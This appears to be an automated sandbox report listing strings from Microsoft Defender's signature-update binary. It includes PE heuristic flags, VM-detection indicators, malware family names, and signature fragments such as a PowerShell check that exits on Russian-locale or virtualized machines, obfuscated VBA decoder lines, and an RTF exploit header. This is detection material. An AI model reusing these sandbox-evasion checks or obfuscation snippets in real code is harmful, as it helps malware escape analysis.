Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp	Binary or memory string: PSF1.00123456789ABCDEF0123456789abcdefpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_disable_apicall_limitpea_kernel_scanpea_uses_single_steppingpea_uses_breakpointspea_uses_privinstrpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_access_violationpea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_vsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_genpackedpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_access_violationpea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesiz
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	Binary or memory string: virtual hd
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: % *.xml.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	Binary or memory string: f)a.VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	Binary or memory string: =mQ:#LowFiDetectsVmWareU
Source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp	Binary or memory string: unsubscribe vmnet notification
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: qemu-ga.exe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: vmware svga ii
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	Binary or memory string: \\.\VBoxMiniRdrDN
Source: WerFault.exe, 00000009.00000003.3000293502.000000000616F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	Binary or memory string: Anti Sandboxie/VMware
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmms.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	Binary or memory string: VMWARE": IsVirtualPCPresent
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	Binary or memory string: myapp.exeqemu
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	Binary or memory string: AntiVmWare
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: "IsInVMware":
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	Binary or memory string: FA*.\|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: % *.img.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	Binary or memory string: sandboxvmware]
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmcompute.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .vmgs.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	Binary or memory string: IsVmWare]
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .ISO.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmsp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	Binary or memory string: *.\|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: ZU%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	Binary or memory string: Global\VBoxService.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp	Binary or memory string: VMwareVMware
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: vboxmrxnp.dll
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .VSV.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp	Binary or memory string: 0123456789ABCDEF0123456789abcdef\Device\\SystemRootcoroutinenewproxyLua 5.1_VERSIONpairsipairs__modekv_Gcreateresumerunningstatuswrapyieldpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_uses_single_steppingpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesizepea_dmg_unsupportedpea_dmg_importspea_dmg_invaliddatapea_dmg_decompresspea_
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmms.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: 3.%ProgramFiles%\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	Binary or memory string: %vmware
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: %Public%\Documents\Hyper-V\Virtual Hard Disks\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	Binary or memory string: if(((get-uiculture).name-match"ru\|ua\|by\|cn")-or((get-wmiobject-classwin32_computersystem-propertymodel).model-match"virtualbox\|vmware\|kvm")){exit;}
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: &!*.xml.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	Binary or memory string: http://pubs.vmware.com
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: vmGuestLib.dll
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: "vmware"$bisvm=trueelseif$smodel="virtualbox"
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	Binary or memory string: SCSIDISKxxvmboxxxharddiskVMware
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	Binary or memory string: !#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	Binary or memory string: +ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	Binary or memory string: ,ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	Binary or memory string: VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: % *.txt.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	Binary or memory string: ".VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	Binary or memory string: Virtual HD
Source: MpSigStub.exe, 00000024.00000003.6333688289.00000197A3355000.00000004.00000001.sdmp	Binary or memory string: 8mus=mud_muramuyamuebmufbmuhbmu_emuiemuqemuimmujnmuhomubrmufrmu]tmuevmucwmucymu
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	Binary or memory string: ifstringregexp($oobjectitem.name,"(?i)virtualbox\|vmware\|virtualpc\|sandbox\|333333\|home-off-d5f0ac\|microsof-2c393f\|123\|vwinxp-maltest")thenreturn1
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	Binary or memory string: 3svmcibex9
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	Binary or memory string: vmware-authd.exe
Source: MpSigStub.exe, 00000024.00000003.6354447244.00000197A41E2000.00000004.00000001.sdmp	Binary or memory string: *.log.\|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: VMware Physical Disk Helper Service
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: &!*.toc.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp	Binary or memory string: __tbt_isVirtualMachine
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	Binary or memory string: VBoxService.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	Binary or memory string: VMWARETRAY.EXEx
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: *.BIN.\|%SYSTEMPROCESS%\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6311374999.00000197A384A000.00000004.00000001.sdmp	Binary or memory string: w!#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	Binary or memory string: qemuvirtualvmware\\.\PhysicalDrive0
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: VMWare
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: =8*.BIN.\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	Binary or memory string: p!#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	Binary or memory string: vmwareservice.exe
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: >Host: virtualmachine-update.com
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	Binary or memory string: KF*.\|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp	Binary or memory string: .vhds.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-armel.exe

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe

Process information queried: ProcessInformation

Source: unknown

Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'

Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: array("winmgmts:","win32_logicaldisk","win32_operatingsystem","winmgmts:\\localhost\root\securitycenter","antivirusproduct")
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: ropen "post","http://127.0.0.1:5/"&c,falsexs
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: !bazarloader.a!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: !bazarloader.b!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: !glupteba.oo!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: trojandownloader:o97m/obfuse.rvk!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: $trojandownloader:o97m/obfuse.rvk!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: getobject(nuts("136122127126120126133132075"))
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: .getobject(nuts("136122127126120126133132075"))
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: almonds = right(jelly, len(jelly) - 3)
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: &almonds = right(jelly, len(jelly) - 3)
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: pears = chr(beets - 17)
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: loop while len(milk) > 0
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: get(nuts("104122127068067112097131128116118132132")).create
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: ;get(nuts("104122127068067112097131128116118132132")).create]
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: backdoor:win64/bazarldr.mdk!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: !injector.ss!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: !qakbot.sm!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: trojandownloader:o97m/obfuse.rsz!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: $trojandownloader:o97m/obfuse.rsz!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: trojandownloader:o97m/qakbot.akg!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: $trojandownloader:o97m/qakbot.akg!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: trojandownloader:o97m/qakbot.qgl!eml
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: $trojandownloader:o97m/qakbot.qgl!eml
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: trojandownloader:o97m/qakbot.qgm!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: $trojandownloader:o97m/qakbot.qgm!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: !raccoonstealer.pa!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: !raccoonstealer.da!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: trojandropper:androidos/anubis.a!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: %$trojandropper:androidos/anubis.a!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: !bazzarloader.km!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: fuck def
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: txg>>osixdustk8
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: trojandownloader:o97m/dridex.abe!eml
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: $trojandownloader:o97m/dridex.abe!eml
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: exploit:o97m/cve-2017-11882.rve!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: #exploit:o97m/cve-2017-11882.rve!mtb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: {\rtf78044\page91063872723894035@nmljmdmhsqt5ua7x@-tiwyg4ih4hj8xqcag<eh&&0_m-d_g--_-d,64>36852$cv>yt=n5\|:%_>n2%bm\agbt
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: x{\rtf78044\page91063872723894035@nmljmdmhsqt5ua7x@-tiwyg4ih4hj8xqcag<eh&&0_m-d_g--_-d,64>36852$cv>yt=n5\|:%_>n2%bm\agbt
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: small.ms!mtb
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: fc.pdb
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: fc.pdb0
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: filedescriptiondos 5 file compare utility&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: internalnamefc
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: originalfilenamefc.exed
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: fileversion1.1.6956.0:
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: productversion1.1.6956.0d
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 0t1x12
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 252>2h2q2[2g2m2t2}2
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 3/353o3z3l3t3y3~3
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 4$4c4i4s4y4b4g4
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: $c:\windows\system32\find.exemz
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb0
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .g-statics.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p*//guptaeyecentre.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(.guptaeyecentre.com
